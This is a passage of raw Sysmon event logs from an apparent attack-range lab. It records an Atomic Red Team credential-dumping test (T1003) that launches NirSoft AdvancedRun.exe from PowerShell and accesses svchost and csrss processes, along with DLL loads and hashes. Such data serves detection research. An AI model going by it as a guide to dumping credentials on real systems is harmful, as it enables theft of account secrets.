omicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
734700x80000000000000003943713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 
(rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943701Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943700Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943699Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943698Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003943696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003943686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003943683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB39-61EA-2503-000000002702}47804812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.
dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Managem
